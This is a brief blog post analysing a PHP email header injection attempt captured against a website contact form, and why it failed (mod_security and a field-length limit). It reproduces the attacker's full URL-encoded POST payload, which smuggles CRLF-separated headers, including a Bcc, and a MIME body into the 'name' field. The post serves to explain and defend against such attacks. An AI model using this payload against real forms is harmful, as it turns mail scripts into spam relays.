Sample PHP Email Injection from a real Attacker

This posting has been in my drafts for over a year. It's really interesting to see how PHP mail injection is done in the wild. Hopefully Michael doesn't mind me posting details - if he does it's not a problem since I'm sure he doesn't read these posts. :)

---------------------------------------------------------------------------

Here is a php email injection attempt captured "in the wild". This attack was against the same script that was exploited in PHP Email Injection Step by Step.

The attack wasn't successful for 2 reasons. First mod_security was used to block certain tell-tale signs of php email injection. The second reason is that the script limits the "name" field to a reasonable number which this attempt exceeded.

text=stood8261%40spree.mnin.org&
email=stood8261%40spree.mnin.org&
Submit=stood8261%40spree.mnin.org&
name=him%0D%0AContent-Type%3A+multipart%2Fmixed%3B+bound

ary%3D3cde64db239a99d3c03a2b3399a85a90%0AMIME-Version%3A+1.0%0ASubject%3A+to+himsilf%2C+a+habit+iv+dog%0Abcc%3A+charleses3229%40aol.com%0A%0AThis+is+a+mult
i-part+message+in+MIME+format.%0A%0A--3cde64db239a99d3c03a2b3399a85a90%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0%0AC
ontent-Transfer-Encoding%3A+7bit%0A%0Amay+remember+at+tto+s+visit%0A--3cde64db239a99d3c03a2b3399a85a90--%0A%0D%0A.%0D%0A